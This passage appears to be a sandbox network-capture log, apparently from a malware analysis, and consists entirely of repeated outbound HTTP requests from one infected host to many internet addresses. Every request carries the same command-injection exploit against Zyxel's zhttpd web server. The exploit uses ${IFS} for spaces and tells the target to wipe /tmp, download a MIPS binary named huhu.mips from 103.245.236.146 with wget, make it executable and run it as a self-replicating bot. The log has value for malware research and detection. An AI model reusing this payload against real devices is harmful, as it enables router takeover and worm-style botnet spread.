                                                Jan 29, 2024 07:07:53.453541994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5702192.168.2.2340684157.14.11.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453593969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5703192.168.2.2351598160.13.58.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453635931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5704192.168.2.234839468.48.153.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453665972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5705192.168.2.235113439.3.113.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453689098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5706192.168.2.235840041.128.205.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453731060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5707192.168.2.233988436.32.89.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453772068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5708192.168.2.234094235.236.24.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453804016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5709192.168.2.234688035.49.209.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453861952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5710192.168.2.235805062.84.116.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453911066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5711192.168.2.234239486.158.238.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453924894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5712192.168.2.2351830177.5.119.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.453973055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5713192.168.2.23438342.99.198.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454016924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5714192.168.2.2332906159.153.244.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454060078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5715192.168.2.2340800108.198.247.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454097033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5716192.168.2.2348390186.13.68.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454138994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5717192.168.2.235642834.199.34.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454181910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5718192.168.2.2336038194.139.146.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454248905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5719192.168.2.2334554161.144.140.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454267025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5720192.168.2.233871871.1.93.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454301119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5721192.168.2.234483261.112.119.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454346895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5722192.168.2.234147640.33.99.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454408884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5723192.168.2.2359846144.229.78.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454427958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5724192.168.2.233411076.26.81.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454459906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5725192.168.2.2334596129.171.116.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454524994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5726192.168.2.2337270177.188.222.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454540968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5727192.168.2.2360788186.60.255.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454586029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5728192.168.2.235142869.47.148.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454615116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5729192.168.2.2356472135.168.161.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454674006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5730192.168.2.2335954217.1.204.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454714060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5731192.168.2.233957083.248.32.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454758883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5732192.168.2.2359622210.30.209.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454791069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5733192.168.2.23452644.75.86.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454834938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5734192.168.2.2350206193.74.162.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454854965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5735192.168.2.2343952184.246.229.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454916954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5736192.168.2.2345062223.169.46.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454950094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5737192.168.2.233918242.188.21.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.454984903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5738192.168.2.2349310150.85.147.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455034971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5739192.168.2.2356246101.232.253.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455091000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5740192.168.2.2346628141.156.206.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455095053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5741192.168.2.235953452.125.155.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455131054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5742192.168.2.233996613.238.210.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455171108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5743192.168.2.2359754165.194.140.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455193043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5744192.168.2.234165865.54.100.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455259085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5745192.168.2.2340924153.191.231.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455288887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5746192.168.2.234894663.34.249.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455307007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5747192.168.2.2344294126.84.111.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455359936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5748192.168.2.2344746135.74.118.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455395937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5749192.168.2.2333726115.68.203.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455423117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5750192.168.2.2359058171.228.205.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455456018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5751192.168.2.2355958105.161.44.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455497026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5752192.168.2.233755069.199.208.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455521107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5753192.168.2.2344996169.110.210.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455564022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5754192.168.2.234338448.194.14.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455622911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5755192.168.2.23522289.152.245.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455652952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5756192.168.2.2348454217.118.146.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455698013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5757192.168.2.2357242161.36.136.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455722094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5758192.168.2.234012865.157.115.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455764055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5759192.168.2.2354016108.122.151.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455784082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5760192.168.2.2341536217.144.167.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455835104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5761192.168.2.234334686.215.10.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455920935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5762192.168.2.236031053.201.102.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455930948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5763192.168.2.2333020111.152.135.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.455954075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5764192.168.2.233418613.41.56.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.458839893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5765192.168.2.23354108.32.47.22443
                                                TimestampBytes transferredDirectionData
